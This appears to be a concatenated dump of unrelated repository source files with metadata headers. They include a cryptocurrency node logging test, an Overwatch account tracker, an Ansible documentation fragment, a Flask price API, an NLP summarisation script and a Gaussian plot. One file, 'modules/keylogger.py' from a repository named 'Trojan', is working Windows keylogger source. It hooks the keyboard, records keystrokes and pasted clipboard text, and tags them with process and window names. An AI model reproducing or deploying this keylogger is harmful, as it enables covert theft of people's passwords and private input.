] | permissive | LIMXTEC/BitSend | a2943ba8ad9b2d3b57aec0f99ae3f779e626a170 | 925c258f9976cab08169c67d8e530c0339905e46 | refs/heads/master-0.17 | 2022-05-03T10:02:10.976385 | 2021-03-08T14:29:49 | 2021-03-08T14:29:49 | 39,961,776 | 48 | 65 | MIT | 2021-03-08T14:29:50 | 2015-07-30T16:54:11 | C++ | UTF-8 | Python | false | false | 2,980 | py | #!/usr/bin/env python3
# Copyright (c) 2017-2018 The Bitsend Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test debug logging."""
import os
from test_framework.test_framework import BitsendTestFramework
from test_framework.test_node import ErrorMatch
class LoggingTest(BitsendTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.setup_clean_chain = True
def relative_log_path(self, name):
return os.path.join(self.nodes[0].datadir, "regtest", name)
def run_test(self):
# test default log file name
default_log_path = self.relative_log_path("debug.log")
assert os.path.isfile(default_log_path)
# test alternative log file name in datadir
self.restart_node(0, ["-debuglogfile=foo.log"])
assert os.path.isfile(self.relative_log_path("foo.log"))
# test alternative log file name outside datadir
tempname = os.path.join(self.options.tmpdir, "foo.log")
self.restart_node(0, ["-debuglogfile=%s" % tempname])
assert os.path.isfile(tempname)
# check that invalid log (relative) will cause error
invdir = self.relative_log_path("foo")
invalidname = os.path.join("foo", "foo.log")
self.stop_node(0)
exp_stderr = "Error: Could not open debug log file \S+$"
self.nodes[0].assert_start_raises_init_error(["-debuglogfile=%s" % (invalidname)], exp_stderr, match=ErrorMatch.FULL_REGEX)
assert not os.path.isfile(os.path.join(invdir, "foo.log"))
# check that invalid log (relative) works after path exists
self.stop_node(0)
os.mkdir(invdir)
self.start_node(0, ["-debuglogfile=%s" % (invalidname)])
assert os.path.isfile(os.path.join(invdir, "foo.log"))
# check that invalid log (absolute) will cause error
self.stop_node(0)
invdir = os.path.join(self.options.tmpdir, "foo")
invalidname = os.path.join(invdir, "foo.log")
self.nodes[0].assert_start_raises_init_error(["-debuglogfile=%s" % invalidname], exp_stderr, match=ErrorMatch.FULL_REGEX)
assert not os.path.isfile(os.path.join(invdir, "foo.log"))
# check that invalid log (absolute) works after path exists
self.stop_node(0)
os.mkdir(invdir)
self.start_node(0, ["-debuglogfile=%s" % (invalidname)])
assert os.path.isfile(os.path.join(invdir, "foo.log"))
# check that -nodebuglogfile disables logging
self.stop_node(0)
os.unlink(default_log_path)
assert not os.path.isfile(default_log_path)
self.start_node(0, ["-nodebuglogfile"])
assert not os.path.isfile(default_log_path)
# just sanity check no crash here
self.stop_node(0)
self.start_node(0, ["-debuglogfile=%s" % os.devnull])
if __name__ == '__main__':
LoggingTest().main()
| [
"joshaf.est@gmail.com"
] | joshaf.est@gmail.com |
dac228f8927d7c13a5a6fb563f080cd23d2323bf | 84b2a3f79458db00407d03958666317c4b7d33aa | /src/run.py | 467c5bb494434e257411dd919b3ceed54fa31515 | [] | no_license | kych02141/bnet-account-tracker | 1fa19dd01e23a6fe23c316a584a64f1a17b6da09 | 4ebf5c8141b9376df7e7d21a092fb334ec83372e | refs/heads/master | 2023-08-26T13:03:08.761589 | 2021-05-31T03:57:26 | 2021-05-31T03:57:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,223 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
import pyperclip
import time
from account import Account, BanStatus
from console import clear
from profilescraper import get_career_profile
from tabulate import tabulate
from threading import Thread
LEGEND_BAN_SEASONAL = '†'
LEGEND_BAN_PERMANENT = '††'
def mask_battletag(battletag):
split = battletag.split('#')
name = split[0]
id = split[1]
return "%s#%s%s%s" % (name, id[0][:1], '*' * (len(id) - 2), id[-1:])
def mask_email(email):
split = email.split('@')
username = split[0]
domain = split[1]
return "%s%s%s@%s" % (username[0][:1],
'*' * (len(username) - 2),
username[-1:],
domain)
def get_accounts(config):
accounts = []
accounts_data = config['accounts']
account_index = 1
for a in accounts_data:
account = Account(
account_index,
a['email'],
a['battletag'],
a['country'],
a['password'],
a['created'],
a['sms_protected'],
BanStatus(a['ban_status']['banned'],
a['ban_status']['permanent'],
a['ban_status']['seasonal'],
a['ban_status']['expires']))
account_index = account_index + 1
accounts.append(account)
return accounts
def get_avg_sr(accounts, role):
placed_accts = 0
total_sr = 0
for account in accounts:
profile = account.profile
sr = getattr(profile, role + "_rating")
if sr:
placed_accts += 1
total_sr += int(sr)
if placed_accts > 0:
return int(total_sr / placed_accts)
else:
return '-'
def print_account_table():
headers = ['']
if config['columns']['email']:
headers.append('Email')
if config['columns']['battletag']:
headers.append('BattleTag')
if config['columns']['country']:
headers.append('Country')
if config['columns']['created']:
headers.append('Created')
if config['columns']['sms']:
headers.append('SMS')
if config['columns']['banned']:
headers.append('Banned')
if config['columns']['level']:
headers.append('Level')
if config['columns']['tank']:
headers.append('Tank')
if config['columns']['damage']:
headers.append('Damage')
if config['columns']['support']:
headers.append('Support')
table_data = []
for account in accounts:
row_data = []
row_data.append(account.id)
if config['columns']['email']:
row_data.append(mask_email(account.email) if config['mask_emails'] else account.email)
if config['columns']['battletag']:
row_data.append(mask_battletag(account.battletag) if config['mask_battletags'] else account.battletag)
if config['columns']['country']:
row_data.append(account.country)
if config['columns']['created']:
row_data.append(account.created)
if config['columns']['sms']:
row_data.append('Yes' if account.sms_protected else 'No')
if config['columns']['banned']:
msg = 'Yes' if account.ban_status.banned else 'No'
if account.ban_status.banned:
if account.ban_status.seasonal:
msg = "%s%s" % (msg, LEGEND_BAN_SEASONAL)
elif account.ban_status.permanent:
msg = "%s%s" % (msg, LEGEND_BAN_PERMANENT)
else:
msg = "%s (%s)" % (msg, account.ban_status.get_expiration().strftime(config['date_format']))
row_data.append(msg)
if config['columns']['level']:
row_data.append(account.profile.level)
if config['columns']['tank']:
row_data.append(account.profile.tank_rating if account.profile.tank_rating else '-')
if config['columns']['damage']:
row_data.append(account.profile.damage_rating if account.profile.damage_rating else '-')
if config['columns']['support']:
row_data.append(account.profile.support_rating if account.profile.support_rating else '-')
clear()
table_data.append(row_data)
tabulate.WIDE_CHARS_MODE = False
print(tabulate(table_data, headers=headers))
def print_stats():
print(tabulate([[sum(a.profile.level if a.profile.level is not None else 0 for a in accounts),
get_avg_sr(accounts,
"tank"),
get_avg_sr(accounts,
"damage"),
get_avg_sr(accounts,
"support")]],
headers=['Total Levels',
'Tank Avg',
'Damage Avg',
'Support Avg']))
def print_legend():
print("%s Seasonal Ban" % (LEGEND_BAN_SEASONAL))
print("%s Permanent Ban" % (LEGEND_BAN_PERMANENT))
def prompt_action():
value = input("\nSelect an account by the ID: ")
if value == '': # enter, refresh list
print_account_table()
else:
try:
id = int()
account = accounts[id - 1]
prompt_account_actions(account)
except IndexError:
pass
except ValueError:
pass
def prompt_account_actions(account):
actions = [
"[1] Copy email to clipboard",
"[2] Copy password to clipboard",
"[3] Copy battletag to clipboard",
"[4] Go back"
]
for a in actions:
print(a)
print()
valid_action = False
while not valid_action:
try:
action = int(
input("What would you like to do with this account: "))
actions[action - 1]
valid_action = True
except IndexError:
pass
except ValueError:
pass
if action == 1:
pyperclip.copy(account.email)
print("Email copied to clipboard!")
if action == 2:
pyperclip.copy(account.password)
print("Password copied to clipboard!")
if action == 3:
pyperclip.copy(account.battletag)
print("Battletag copied to clipboard!")
if action == 4:
pass
print("Returning to accounts...")
def load_config():
config = None
with open('config/config.json', encoding='utf-8') as json_file:
config = json.load(json_file)
return config
def update_account_stats(accounts):
for i in range (0, len(accounts)):
print("Getting accounts%s" % ("." * i), end="\r")
time.sleep(1.5)
threads = []
for account in accounts:
process = Thread(target=get_career_profile, args=[account])
process.start()
threads.append(process)
for process in threads:
process.join()
if __name__ == "__main__":
config = load_config()
accounts = get_accounts(config)
update_account_stats(accounts)
while True:
print_account_table()
print('')
print_legend()
print('')
print_stats()
time.sleep(0.5)
prompt_action()
| [
"nate.shoffner@gmail.com"
] | nate.shoffner@gmail.com |
758d3add23ff4cc75c3f3557a759800c70585c20 | 27e890f900bd4bfb2e66f4eab85bc381cf4d5d3f | /plugins/doc_fragments/files.py | a3723db249284fc0990a043729d80d3b2ea6bec2 | [] | no_license | coll-test/notstdlib.moveitallout | eb33a560070bbded5032385d0aea2f3cf60e690b | 0987f099b783c6cf977db9233e1c3d9efcbcb3c7 | refs/heads/master | 2020-12-19T22:28:33.369557 | 2020-01-23T18:51:26 | 2020-01-23T18:51:26 | 235,865,139 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,706 | py | # -*- coding: utf-8 -*-
# Copyright: (c) 2014, Matt Martz <matt@sivel.net>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
class ModuleDocFragment(object):
# Standard files documentation fragment
# Note: mode is overridden by the copy and template modules so if you change the description
# here, you should also change it there.
DOCUMENTATION = r'''
options:
mode:
description:
- The permissions the resulting file or directory should have.
- For those used to I(/usr/bin/chmod) remember that modes are actually octal numbers.
You must either add a leading zero so that Ansible's YAML parser knows it is an octal number
(like C(0644) or C(01777)) or quote it (like C('644') or C('1777')) so Ansible receives
a string and can do its own conversion from string into number.
- Giving Ansible a number without following one of these rules will end up with a decimal
number which will have unexpected results.
- As of Ansible 1.8, the mode may be specified as a symbolic mode (for example, C(u+rwx) or
C(u=rw,g=r,o=r)).
- As of Ansible 2.6, the mode may also be the special string C(preserve).
- When set to C(preserve) the file will be given the same permissions as the source file.
type: str
owner:
description:
- Name of the user that should own the file/directory, as would be fed to I(chown).
type: str
group:
description:
- Name of the group that should own the file/directory, as would be fed to I(chown).
type: str
seuser:
description:
- The user part of the SELinux file context.
- By default it uses the C(system) policy, where applicable.
- When set to C(_default), it will use the C(user) portion of the policy if available.
type: str
serole:
description:
- The role part of the SELinux file context.
- When set to C(_default), it will use the C(role) portion of the policy if available.
type: str
setype:
description:
- The type part of the SELinux file context.
- When set to C(_default), it will use the C(type) portion of the policy if available.
type: str
selevel:
description:
- The level part of the SELinux file context.
- This is the MLS/MCS attribute, sometimes known as the C(range).
- When set to C(_default), it will use the C(level) portion of the policy if available.
type: str
default: s0
unsafe_writes:
description:
- Influence when to use atomic operation to prevent data corruption or inconsistent reads from the target file.
- By default this module uses atomic operations to prevent data corruption or inconsistent reads from the target files,
but sometimes systems are configured or just broken in ways that prevent this. One example is docker mounted files,
which cannot be updated atomically from inside the container and can only be written in an unsafe manner.
- This option allows Ansible to fall back to unsafe methods of updating files when atomic operations fail
(however, it doesn't force Ansible to perform unsafe writes).
- IMPORTANT! Unsafe writes are subject to race conditions and can lead to data corruption.
type: bool
default: no
attributes:
description:
- The attributes the resulting file or directory should have.
- To get supported flags look at the man page for I(chattr) on the target system.
- This string should contain the attributes in the same order as the one displayed by I(lsattr).
- The C(=) operator is assumed as default, otherwise C(+) or C(-) operators need to be included in the string.
type: str
aliases: [ attr ]
'''
| [
"wk@sydorenko.org.ua"
] | wk@sydorenko.org.ua |
e843f2f5fde9959a0c9ca2b6065b89fa98b9c9d5 | 2bb83c3cb44e68be897f3a9aec78915f28b8eab3 | /web_service.py | def5cd076a22f733406b388f8d5239615832a583 | [] | no_license | emilianomfortes/Investing.com-Scraper | 3f45fa003e58bc45652533234691fd6a37cec43e | 890d75bcfd6fbe8b74eb8545461f95cb57354cb4 | refs/heads/master | 2023-03-15T21:53:25.016289 | 2019-06-09T07:37:47 | 2019-06-09T07:37:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,135 | py | from flask import Flask
from flask import request
from flask import jsonify, make_response
import numpy as np
from datetime import datetime, timezone
from db_table import db_table
app = Flask(__name__)
# Set up db connection
def get_db_conn():
db_schema = {
"Date": "date PRIMARY KEY",
"Gold": "float",
"Silver": "float"
}
return db_table("Prices", db_schema)
@app.route('/commodity', methods=["GET"])
def compute_commodity():
db = get_db_conn()
# Making sure we have all the arguments we need
if not request.args.get("start_date"):
return make_response(jsonify({"message": "Invalid start date"}), 400)
if not request.args.get("end_date"):
return make_response(jsonify({"message": "Invalid end date"}), 400)
if not request.args.get("commodity_type"):
return make_response(jsonify({"message": "Invalid commodity type"}), 400)
start = request.args.get("start_date")
end = request.args.get("end_date")
commodity_type = request.args.get("commodity_type")
# Convert datetime to Unix timestamp to index into DB
start = datetime.strptime(start, "%Y-%m-%d").replace(tzinfo=timezone.utc).timestamp()
end = datetime.strptime(end, "%Y-%m-%d").replace(tzinfo=timezone.utc).timestamp()
if commodity_type.lower() != "gold" and commodity_type.lower() != "silver":
return make_response(jsonify({"message": "Commodity type gold or silver only"}), 400)
results = db.select_prices_between_dates(start, end, commodity_type)
data = {}
numpy_array = []
for result in results:
date = str(datetime.utcfromtimestamp(result[0]))
price = result[1] or -1
if price is -1:
continue
data[date[:-9]] = price
numpy_array.append(price)
mean = np.mean(numpy_array).astype(float)
variance = np.var(numpy_array).astype(float)
return_data = {
"data": data,
"mean": round(mean, 2), # Example given, the data was rounded to the closes 2 decimal places
"variance": round(variance, 2)
}
return make_response(jsonify(return_data), 200)
| [
"thomas.pham96@yahoo.com"
] | thomas.pham96@yahoo.com |
57fab0e19bb4bd272a0f164b668604ea96c0d46e | d20566ab9a909c36559568dc49e77e76d75ab62b | /ams/structures/sim_taxi_user.py | 41cd8b1dcf1ea1107ad18109fac8162320a52e15 | [
"Apache-2.0"
] | permissive | yangkang411/AMS | 3049712afd37bf7463adfa25e8f01ffbe226ba54 | bb685024b1c061e7144dc2ef93e09d6d6c830af8 | refs/heads/master | 2022-01-05T15:56:05.063164 | 2018-04-13T06:28:24 | 2018-04-13T06:28:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 654 | py | #!/usr/bin/env python
# coding: utf-8
from ams.structures import get_namedtuple_from_dict
SIM_TAXI_USER = get_namedtuple_from_dict("CONST", {
"NODE_NAME": "SimTaxiUser",
"TRIGGER": {
"REQUEST": "request",
"WAIT": "wait",
"GET_ON": "get_on",
"GOT_ON": "got_on",
"MOVE_VEHICLE": "move_vehicle",
"GET_OUT": "get_out",
"GOT_OUT": "got_out"
},
"STATE": {
"CALLING": "calling",
"WAITING": "waiting",
"GETTING_ON": "getting_on",
"GOT_ON": "got_on",
"MOVING": "moving",
"GETTING_OUT": "getting_out",
"GOT_OUT": "got_out"
},
})
| [
"hiro-ya-iv@gmail.com"
] | hiro-ya-iv@gmail.com |
078c7897397892d20957b1746bb3eda834acdc22 | ca234628f41b010cb9ef51d46a612172f5810f5c | /Codes/NN/feature_extraction.py | 957041a02974da108859464e931afc11c57509fd | [] | no_license | AdityaGolatkar/Document-Summarization-by-key-sentence-extraction-using-NN | 88f064466d847936c957a2fddfd44d637fb7c717 | 8a7c37b289cec117f273abc438d8b51f2e97592d | refs/heads/master | 2020-03-26T15:59:51.766083 | 2018-10-10T04:09:05 | 2018-10-10T04:09:05 | 145,076,388 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,113 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Nov 23 16:55:33 2017
@author: Rudrajit Aditya Akash
"""
import csv
import nltk
#nltk.download('punkt')
import re
import glob
import numpy as np
from gensim.models import Word2Vec
from sklearn.metrics.pairwise import cosine_similarity
#import pdb
#model = KeyedVectors.load_word2vec_format('/home/audy/GoogleNews-vectors-negative300.bin', binary=True)
from sklearn.decomposition import TruncatedSVD
def compute_pc(X,npc=1):
"""
Compute the principal components. DO NOT MAKE THE DATA ZERO MEAN!
:param X: X[i,:] is a data point
:param npc: number of principal components to remove
:return: component_[i,:] is the i-th pc
"""
svd = TruncatedSVD(n_components=npc, n_iter=7, random_state=1)
svd.fit(X)
return svd.components_
def remove_pc(X, npc=1):
"""
Remove the projection on the principal components
:param X: X[i,:] is a data point
:param npc: number of principal components to remove
:return: XX[i, :] is the data point after removing its projection
"""
pc = compute_pc(X, npc)
if npc==1:
XX = X - X.dot(pc.transpose()) * pc
else:
XX = X - X.dot(pc.transpose()).dot(pc)
return XX
def get_sentences(file_name):
tokenizer = nltk.data.load('tokenizers/punkt/english.pickle')
fp = open(file_name)
text = fp.read()
sentences = tokenizer.tokenize(text)
return sentences
def get_words(sentence):
words = re.sub("[^\w]", " ", sentence).split()
return words
def get_total_word_count():
#f = open('git_prob.txt', 'r',encoding="ISO-8859-1")
f = open('git_prob.txt', 'r')
N = 0
for line in f.readlines():
line = str(line.lower())
line = line.strip().lower()
word_and_prob = str(line)
count = word_and_prob[line.index(' ')+1:]
N = N+int(count)
f.close()
# if the word was not found in the list, return 0
return N
def get_one_word_prob(word_ex,N):
#f = open('git_prob.txt', 'r',encoding="ISO-8859-1")
f = open('git_prob.txt', 'r')
for line in f.readlines():
line = str(line.lower())
line = line.strip().lower()
word_and_prob = str(line)
if(len(word_and_prob) > len(word_ex)):
if(word_and_prob[len(word_ex)] == ' '):
word = word_and_prob[0:len(word_ex)]
prob = word_and_prob[len(word_ex)+1:]
if word.lower() == word_ex.lower():
prob = (int(prob)/N)
f.close()
return prob
# if the word was not found in the list, return 0
return 0
def get_word_prob(words,N):
word_prob = np.zeros(len(words))
for i in range(0,len(words)):
word_prob[i] = get_one_word_prob(words[i],N)
return word_prob
def prob_and_vec(words,model,N):
m = 300
tot = 100000000000
word_vec = np.zeros([m,len(words)])
word_prob = np.zeros(len(words))
word_prob = get_word_prob(words,N)
#pdb.set_trace()
for i in range(0,len(words)):
try:
word_vec[:,i] = model[words[i]]
#word_prob[i] = model.vocab[words[i]].count/tot
except:
try:
word_vec[:,i] = model[words[i].capitalize()]
#word_prob[i] = model.vocab[words[i].capitalize()].count/tot
except:
try:
word_vec[:,i] = model[words[i].upper()]
#word_prob[i] = model.vocab[words[i].upper()].count/tot
except:
word_vec[:,i] = np.zeros((300,))
#word_prob[i] = 0
return word_vec, word_prob
def get_sentence_embeddings(file_name,model,N):
sentences = get_sentences(file_name)
m = 300
sentence_embedding = np.zeros([m,len(sentences)])
#a = 50
#a = 8e-3
a = 2.5e-3
#pdb.set_trace()
#sentence_embedding[] = sentence_embedding - np.mean(sentence_embedding[:,i])
for i in range(0,len(sentences)):
words = get_words(sentences[i])
[words_vec,words_prob] = prob_and_vec(words,model,N)
#words_prob = 1e5*words_prob
words_coeff = np.divide(a,a+words_prob)
if (len(words) != 0):
sentence_embedding[:,i] = np.dot(words_vec,words_coeff)/len(words)
#sentence_embedding_trans = sentence_embedding.T
#sentence_embedding_mean = sentence_embedding_trans.mean(axis = 0)
#sentence_embedding_centered = sentence_embedding_trans - sentence_embedding_mean
#sentence_embedding_centered = sentence_embedding_centered.T
#sentence_embedding_mean = sentence_embedding_mean.T
#sentence_embedding_mean = sentence_embedding.mean(axis = 1)
#sentence_embedding_mean = np.reshape(sentence_embedding_mean,[m,1])
#sentence_embedding_mean = np.tile(sentence_embedding_mean,len(sentences))
#sentence_embedding_centered = sentence_embedding - sentence_embedding_mean
#[U,_,_] = np.linalg.svd(sentence_embedding_centered)
#u = np.reshape(U[:,0],(len(U[:,0]),1))
#sentence_embedding_centered = sentence_embedding_centered - np.dot(u,np.dot(u.transpose(),sentence_embedding_centered))
#sentence_embedding = sentence_embedding_centered + sentence_embedding_mean
sentence_embedding_pure = remove_pc(sentence_embedding.T,1)
sentence_embedding_pure = sentence_embedding_pure.T
return sentence_embedding_pure
def get_text_and_summary():
news = csv.reader(open('news_summary.csv',encoding="ISO-8859-1"), delimiter=',')
#news = csv.reader(open('news_summary.csv'), delimiter=',')
N = 4515
text = [[] for i in range(N)]
text_summ = [[] for i in range(N)]
i = 0
b = 0
for row in news:
if b == 0:
b = 1
continue
else:
# To correct most of the bullshit in the actual text
t = str(row[5])
lt = len(t)
for j in range(0,lt-1):
if (j >= len(t)-1):
break
if (t[j] == '.' and t[j+1] != ' '):
t1 = t[0:j+1]
t2 = t[j+1:]
t = t1+' '+t2
if (t[j] == '?'):
t1 = t[0:j]
t2 = t[j+1:]
t = t1+t2
text[i] = t
text_summ[i] = str(row[4])
#text[i] = row[5]
#text_summ[i] = row[4]
i = i+1
return text,text_summ
def get_text_and_summary2():
ct = 0
for filename in glob.glob('Summaries/*.txt'):
ct = ct+1
print(ct)
text = [[] for i in range(ct)]
text_summ = [[] for i in range(ct)]
i = 0
for filename in glob.glob('Summaries/*.txt'):
fo = open(filename)
f = fo.read()
sentences_in_text = f.split(":")
#print(sentences_in_text)
text[i] = sentences_in_text[2]
text_summ[i] = sentences_in_text[1][:-12]
i = i+1
return text,text_summ
def get_key_sentence_labels(sentence_embeddings,sentence_embeddings_summ):
#Get the no of sentences in summary
dim_summ = sentence_embeddings_summ.shape
summ_ct = dim_summ[1]
#Get the no of sentences in actual file
dim = sentence_embeddings.shape
ct = dim[1]
key_sentences = np.zeros(ct)
for i in range(0,summ_ct):
#tmp = np.transpose(np.tile(sentence_embeddings_summ[:,i],(ct,1)))
# inner product used to measure closeness
#dot_prod = np.sum(np.multiply(tmp,sentence_embeddings),0)
dot_prod = cosine_similarity((sentence_embeddings_summ[:,i]).reshape(1,-1),np.transpose(sentence_embeddings))
key_sentences[np.argmax((dot_prod))] = 1
#print(np.argmax((dot_prod)))
return key_sentences
# Zero padding done to deal with sentences at the beginning and end
def get_input_and_ouptut_vectors(text,text_summ,N1,N2,z,model,no):
N = 4515
# m = 300 from fastText word vectors
#m = 300
# m = 100 for gensim
m = 300
win = 3
w = (2*win+1)*m
# X will be a p X w matrix, where p = number of sentences available
# Each row contains the sentence embedding vectors (stacked one after the
# other) of the (2*win+1) sentences in a window - For Feedforward NN
X = np.zeros([1,w])
Y = np.zeros([1,2])
b = 0
for i in range(N1,N2):
if(i == 12):
continue
if(i == 20):
continue
if(i == 21):
continue
if(i == 40):
continue
if(i == 120):
continue
if(i == 121):
continue
if(i == 133):
continue
if(i == 134):
continue
if(i == 147):
continue
if(i == 148):
continue
if(i == 151):
continue
if(i == 152):
continue
if(i == 154):
continue
if(i == 155):
continue
if(i == 161):
continue
if(i == 162):
continue
if(i == 167):
continue
if(i == 168):
continue
if(i == 169):
continue
if(i == 170):
continue
# clear the contents of the file before every iteration
open('text.txt', 'w').close()
file_text = open('text.txt','w')
file_text.write(text[i])
file_text.close()
sentences = get_sentences('text.txt')
if (len(sentences) == 0):
continue
sentence_embeddings = get_sentence_embeddings('text.txt',model,no)
#pdb.set_trace()
open('text_summ.txt', 'w').close()
file_summ = open('text_summ.txt','w')
file_summ.write(text_summ[i])
file_summ.close()
sentence_embeddings_sum = get_sentence_embeddings('text_summ.txt',model,no)
# key_sentences should be a nX1 array (n = number of sentences)
# containing only 1s (if the sentence corresponding to that index is a
# key sentence) and 0s.
key_sentences = get_key_sentence_labels(sentence_embeddings,sentence_embeddings_sum)
#for t in range(0,len(key_sentences)):
# if(key_sentences[t] == 1):
# print(sentences[t])
# print('YaaY')
#pdb.set_trace()
# zero-pad 'sentence_embeddings' - not sure if this is a good idea!!!
sentence_embeddings_zero_padded = np.zeros([m,2*win+sentence_embeddings.shape[1]])
sentence_embeddings_zero_padded[:,win:win+sentence_embeddings.shape[1]] = sentence_embeddings
sentence_embeddings = sentence_embeddings_zero_padded
try:
for j in range(win,len(key_sentences)+win):
#if (j >= win and j < len(key_sentences)-win):
if b == 0:
X[b,:] = (np.transpose(sentence_embeddings[:,j-win:j+win+1])).ravel()
Y[b,0] = key_sentences[j-win]
b = 1
else:
X = np.vstack((X,(np.transpose(sentence_embeddings[:,j-win:j+win+1])).ravel()))
Y = np.vstack((Y,np.array([key_sentences[j-win],0])))
except:
continue
print(i)
"""
if(i >=167):
Y = Y[:,0]
if z == 1:
np.save('X_train_122222.npy',X)
np.save('Y_train_122222.npy',Y)
else:
np.save('X_test_122222.npy',X)
np.save('Y_test_122222.npy',Y)
"""
Y = Y[:,0]
if z == 1:
np.save('X_train_122222.npy',X)
np.save('Y_train_122222.npy',Y)
else:
np.save('X_test_122222.npy',X)
np.save('Y_test_122222.npy',Y)
return X,Y
def generate_summary_file(text,key_sentence_labels,N1,N2):
file_write_summ = open('summary.txt','w')
ct = 0
for i in range(N1,N2):
open('text.txt', 'w').close()
file_text = open('text.txt','w')
file_text.write(text[i])
file_text.close()
sentences = get_sentences('text.txt')
for j in range(0,len(sentences)):
#print(ct)
if(ct < len(key_sentence_labels)):
if (key_sentence_labels[ct] == 1):
file_write_summ.write(sentences[j])
ct = ct+1
file_write_summ.write('\n')
file_write_summ.write('\n')
file_write_summ.close()
def get_input_for_CNN(X):
num_points = X.shape[0]
win = 3
w = (2*win+1)
m = 300
X_CNN = np.zeros([num_points,m,w])
for i in range(0,w):
X_CNN[:,:,i] = X[:,m*i:m*(i+1)]
return X_CNN
| [
"chelsea.aditya@gmail.com"
] | chelsea.aditya@gmail.com |
f53973cb2c5d59d6ecde1124bde8d394e1012c75 | 508fd0c0bda8bed4a583b6e49a35083710a52e66 | /2d-gaussian.py | 9af9e15f8863355055ead1f6882c3e68dc24d426 | [] | no_license | cagnol/CIP | eced651209d7848337570aa33b0243bd6f36eec8 | 65d394f5b46430c7d5e539ebcf635bb08352fda2 | refs/heads/master | 2020-09-04T14:56:43.726377 | 2019-11-05T16:53:37 | 2019-11-05T16:53:37 | 219,761,656 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,736 | py | # This program was created by Christian Hill (IAEA)
# Used, with permission, in the CentraleSupelec CIP class - Lab #10
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import cm
from mpl_toolkits.mplot3d import Axes3D
# Our 2-dimensional distribution will be over variables X and Y
N = 60
X = np.linspace(-5, 5, N)
Y = np.linspace(-5, 5, N)
X, Y = np.meshgrid(X, Y)
# Mean vector and covariance matrix
mu = np.array([0, 0])
Sigma = np.array([[1 , 0], [0, 1]])
# Pack X and Y into a single 3-dimensional array
pos = np.empty(X.shape + (2,))
pos[:, :, 0] = X
pos[:, :, 1] = Y
def multivariate_gaussian(pos, mu, Sigma):
"""Return the multivariate Gaussian distribution on array pos.
pos is an array constructed by packing the meshed arrays of variables
x_1, x_2, x_3, ..., x_k into its _last_ dimension.
"""
n = mu.shape[0]
Sigma_det = np.linalg.det(Sigma)
Sigma_inv = np.linalg.inv(Sigma)
N = np.sqrt((2*np.pi)**n * Sigma_det)
# This einsum call calculates (x-mu)T.Sigma-1.(x-mu) in a vectorized
# way across all the input variables.
fac = np.einsum('...k,kl,...l->...', pos-mu, Sigma_inv, pos-mu)
return np.exp(-fac / 2) / N
# The distribution on the variables X, Y packed into pos.
Z = multivariate_gaussian(pos, mu, Sigma)
# Create a surface plot and projected filled contour plot under it.
fig = plt.figure()
ax = fig.gca(projection='3d')
ax.plot_surface(X, Y, Z, rstride=3, cstride=3, linewidth=1, antialiased=True,
cmap=cm.viridis)
cset = ax.contourf(X, Y, Z, zdir='z', offset=-0.15, cmap=cm.viridis)
# Adjust the limits, ticks and view angle
ax.set_zlim(-0.15,0.2)
ax.set_zticks(np.linspace(0,0.2,5))
ax.view_init(27, -21)
plt.show()
| [
"noreply@github.com"
] | cagnol.noreply@github.com |
f3c92b2e8985689e0247cfdac48bad241ea68cfa | 4437b255b48afbc75a35bc99b1c5a90cc779ceeb | /modules/keylogger.py | 66a2dfd98d49c32d267126b023b3473cd44f0ab4 | [] | no_license | Mahiuha/Trojan | 2efd536bda06afdea1d94e02e6a25cfb74a1f6bc | bcb61d9c8ad7ceb0a12d40ad23796cbb9165623a | refs/heads/master | 2023-06-11T02:19:34.947055 | 2021-07-01T01:25:06 | 2021-07-01T01:25:06 | 260,301,764 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,978 | py | from ctypes import *
import pythoncom
import pyHook
import win32clipboard
user32 = windll.user32
kernel32 = windll.kernel32
psapi = windll.psapi
current_window = None
def get_current_process():
# get a handle to the foreground window
hwnd = user32.GetForegroundWindow()
# find the process ID
pid = c_ulong(0)
user32.GetWindowThreadProcessId(hwnd, byref(pid))
# store the current process ID
process_id = "%d" % pid.value
# grab the executable
executable = create_string_buffer("\x00" * 512)
h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)
psapi.GetModuleBaseNameA(h_process,None,byref(executable),512)
# now read its title
window_title = create_string_buffer("\x00" * 512)
length = user32.GetWindowTextA(hwnd, byref(window_title),512)
# print out the header if we're in the right process
print
print ("[ PID: %s - %s - %s ]" % (process_id, executable.value, window_title.value))
print
# close handles
kernel32.CloseHandle(hwnd)
kernel32.CloseHandle(h_process)
def KeyStroke(event):
global current_window
# check to see if target changed windows
if event.WindowName != current_window:
current_window = event.WindowName
get_current_process()
# if they pressed a standard key
if event.Ascii > 32 and event.Ascii < 127:
print (chr(event.Ascii),)
else:
# if [Ctrl-V], get the value on the clipboard
if event.Key == "V":
win32clipboard.OpenClipboard()
pasted_value = win32clipboard.GetClipboardData()
win32clipboard.CloseClipboard()
print ("[PASTE] - %s" % (pasted_value),)
else:
print ("[%s]" % event.Key,)
# pass execution to next hook registered
return True
# create and register a hook manager
kl = pyHook.HookManager()
kl.KeyDown = KeyStroke
# register the hook and execute forever
kl.HookKeyboard()
pythoncom.PumpMessages()
| [
"tiasho.mahiuha@gmail.com"
] | tiasho.mahiuha@gmail.com |
6bd87fef952e8c69e3423f386f408538339d9185 | 8370083dbbbd32740ad1862637809396dc7984e2 | /paresh61.A.MILESTONEPROJECTE/a1.py | 524064c675bcdabbfbdd144f009ea8b4126de4dc | [] | no_license | parshuramsail/PYTHON_LEARN | a919b14aab823e0f5e769d8936ddbfb357133db2 | 8c76720bf73f13cf96930e6d4d5128e6ba9aa535 | refs/heads/main | 2023-07-14T16:25:26.240555 | 2021-08-29T17:10:19 | 2021-08-29T17:10:19 | 401,095,644 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,294 | py | # STEP1: write a function that can printout a board.setup your board as your list,where each index 1-9 corresponnds with a number on a numberpad.
